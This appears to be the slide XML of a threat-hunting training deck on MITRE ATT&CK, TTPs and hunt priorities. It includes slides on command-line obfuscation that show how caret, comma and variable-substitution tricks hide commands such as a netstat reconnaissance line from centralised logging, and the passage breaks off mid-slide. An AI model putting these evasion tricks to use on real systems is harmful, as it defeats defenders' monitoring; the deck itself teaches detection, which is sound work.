                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E482ACF7-A6B4-1AAC-EA59-363C73344280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20836" y="921317"/>
            <a:ext cx="12150329" cy="6859416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17337436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B793F-1824-480A-74C4-4BCC48DF3A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C4A082-7BB0-E658-D7C7-FF201002F3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>ATT&amp;CK considers all phases of an attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="ATT&amp;CK">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0487B9-04EA-B04F-F762-04E86D6BB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566863"/>
            <a:ext cx="975360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440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7AFCF0-C3C2-B68E-01E7-A1F22387A25B}"/>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E3FB2D-315F-DA61-F42D-26CEC193F942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586478" y="1683756"/>
            <a:ext cx="3115265" cy="2396359"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The concept of TTPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39091085-A938-C294-09AD-166F215F91C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2106651919"/>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4313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A01551-824F-A1D9-6FA4-846A3A480F9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851476-6678-CA1F-4A24-21DF257BF107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK Uses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2BBA8B-D3EA-06DE-5B2B-A9808C6C9B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Using it as a “pinboard” to track what you’re hunting for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Helps with understanding where what you’ve done fits in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Considering the severity of activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Right-side activity is generally most impactful; but be mindful of how quickly things can escalate e.g. exploit of a public-facing application may immediately lead to compromise of an entire organisation in bad cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Considering the other ways your activity of concern could be achieved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Looking at the various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>subtechniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> and procedures available to achieve a given technique is very helpful for understanding what else might be possible, and can be the basis for a proactive hunt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2525307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F1BD20-EE82-278D-2B32-067A95796EE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0FD5F6-C4FC-4574-1E80-95FC24EA7D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466722" y="586855"/>
            <a:ext cx="3201366" cy="3387497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How this influences our hunt strategy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{681082AB-58EC-8D64-201A-B2A121212491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810259" y="649480"/>
            <a:ext cx="6555347" cy="5546047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>We prioritise the most impactful activity first (generally further to the right), for two reasons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>It must be caught as soon as possible due to potentially severe impact and consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>There are more ways to achieve early stage activity than late stage activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>Attackers’ exact means of entrance into a victim environment varies from attack to attack – because no single way of getting in is 100% successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>However, once they’re in, they are much more likely to follow well-defined playbooks that follow their known tactics. This is more predictable and more likely to be found with good hunting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2191376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CB9201-3ECD-0C79-EC61-B0739953114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icky notes with question marks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C4FDB1-7F05-DD2A-0A1D-14447A3A0C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10162" b="5569"/>
          <a:stretch>
            <a:fill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A2EB47-9889-442C-592E-1991B817343D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321733" y="554845"/>
            <a:ext cx="10656891" cy="3902673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1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8370E8C-A903-1382-1405-205498ED4882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315523" y="4718033"/>
            <a:ext cx="10678296" cy="1175039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there any questions so far before we move to the final topic?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2262696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E9785B-FB99-D4A3-D9EB-4D639478609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8A6FEE2-5A94-3523-803E-420036F44A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Line Obfuscation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C448EC-7F5F-F59D-5C6F-65BA26EDDCED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Defeating centralised log hunting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244922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59B59-CE97-E923-B4B6-E5E3206C68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5E3076-6B05-C868-9BF5-8FD1BB8834FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>A simple example obfuscation technique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B36254-B4D4-0C26-6981-355EFC4BEB7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3159439"/>
            <a:ext cx="10515600" cy="3698561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This single command sets the variable x to be equal to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>wscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>e:jscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> …”, but with an @ symbol added so these terms aren’t detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Echo and a pipe “|” are then used to send x to a new cmd.exe, but with the @ symbols removed: %x:@=%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The % symbols are used to reference a local variable, and the “:” syntax in the middle allows modification of it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The cleaned command-line is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>never logged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>, because the command-line logged is the one a process is first executed with</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F0456AC-B670-3B71-D107-163AAB0817C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961470" y="1461469"/>
            <a:ext cx="10269060" cy="1697970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17418672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E78E4-3012-8FE0-2582-C76ED97CE4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49F657-5905-0B17-18B7-22508AA310C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>A second example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4DFD99-5AA2-C2D0-4C40-D0E6B2A318C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338824" y="1690688"/>
            <a:ext cx="11514352" cy="828262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%COMSPEC% /b /c start /b /min netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> LISTENING</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37AA5790-E512-F656-E5EF-DE7E288928E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2480673"/>
            <a:ext cx="10515600"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This (potentially) malicious command uses netstat and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> to return all network connections in the LISTENING state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Not important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>We know how to hunt for this now</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1738863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126FC5-9E12-CFA5-64C5-3213DDFB0C4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DE1FE60-B8F4-1DCF-34AF-2FFC57930FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why do we need to hunt?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA8A114-DC07-2FF6-67A5-FB0E4A4B28FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Evading automated tools should be considered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng"/>
              <a:t>trivial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31510887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B8153-DA1B-5380-1564-AC4AE66DE5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DD451B-05F3-D1F0-873A-ADD8B6F64BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>A second example, obfuscated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1EC172-E41F-3EB0-FB24-2168249CD2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338824" y="1690688"/>
            <a:ext cx="11514352" cy="828262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,;,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>coMSPec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~ -0, +27%,; ,;, ;^^^^/^^^^b^^^^, ;;; ,^^^^/^c, ,,, ;^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^^art^^; , ; ;/^^^^b ; , ^^^^/^^^^min ,;net^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>””at ^^^^ ^^^^-a^^^^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n””o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
